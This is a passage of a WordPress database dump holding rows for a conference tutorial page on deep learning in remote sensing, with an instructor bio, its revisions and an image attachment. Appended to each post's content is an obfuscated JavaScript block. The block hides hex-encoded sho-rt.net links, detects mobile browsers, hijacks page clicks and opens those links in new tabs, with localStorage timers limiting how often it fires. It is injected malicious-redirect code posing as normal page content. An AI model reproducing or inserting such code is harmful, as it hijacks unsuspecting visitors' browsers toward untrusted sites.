style=\"text-align: justify;\">Henry Leung is a professor of the Department of Electrical and Computer Engineering of the University of Calgary. Before joining U of C, he was with the Department of National Defence (DND) of Canada as a defence scientist. His main duty there was to conduct research and development of automated surveillance systems, which can perform detection, tracking, identification and data fusion automatically as a decision aid for military operators. His current research interests include big data analytic,   chaos and nonlinear dynamics, information fusion, machine learning, signal and image processing, robotics and internet of things. He has published extensively in the open literature on these topics. He has over 350 journal papers and 250 refereed conference papers.  He is currently associate editor of Scietific Reports, IEEE Journal on Emerging and Special Topics on Circuits and Systems, Sensor Journal, IEICE Trans. Nonlinear Theory and its Applications, and Aerospace Systems He is the editor of the Springer book series on “Information Fusion and Data Science”. He is a Fellow of IEEE and SPIE.</p>\r\n<p>&nbsp;[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','publish','closed','closed','','deep-learning-in-remote-sensing-algorithms-and-applications','','','2023-02-05 10:05:02','2023-02-05 10:05:02','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3709',0,'dt_portfolio','',0),
(3710,1,'2023-02-02 09:46:08','2023-02-02 09:46:08','','main','','inherit','open','closed','','main','','','2023-02-02 09:46:08','2023-02-02 09:46:08','',3709,'https://gsw2023.com/wp-content/uploads/2023/02/main.jpg',0,'attachment','image/jpeg',0),
(3711,1,'2023-02-02 09:46:27','2023-02-02 09:46:27','','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 09:46:27','2023-02-02 09:46:27','',3709,'https://gsw2023.com/?p=3711',0,'revision','',0),
(3712,1,'2023-02-02 09:53:23','2023-02-02 09:53:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2>Instructor</h2>\n<p>Henry Leung</p>\n<p>Professor, Electrical and Software Engineering</p>\n<p>University of Calgary, Canada</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</p>\n<p><strong><u> </u></strong></p>\n<p><strong><u> </u></strong></p>\n<p><strong><u>Speaker’s Bio</u></strong></p>\n<p>Henry Leung is a professor of the Department of Electrical and Computer Engineering of the University of Calgary. Before joining U of C, he was with the Department of National Defence (DND) of Canada as a defence scientist. His main duty there was to conduct research and development of automated surveillance systems, which can perform detection, tracking, identification and data fusion automatically as a decision aid for military operators. His current research interests include big data analytic,   chaos and nonlinear dynamics, information fusion, machine learning, signal and image processing, robotics and internet of things. He has published extensively in the open literature on these topics. He has over 350 journal papers and 250 refereed conference papers.  He is currently associate editor of Scietific Reports, IEEE Journal on Emerging and Special Topics on Circuits and Systems, Sensor Journal, IEICE Trans. Nonlinear Theory and its Applications, and Aerospace Systems He is the editor of the Springer book series on “Information Fusion and Data Science”. He is a Fellow of IEEE and SPIE.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 09:53:23','2023-02-02 09:53:23','',3709,'https://gsw2023.com/?p=3712',0,'revision','',0),
(3713,1,'2023-02-02 09:57:02','2023-02-02 09:57:02','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 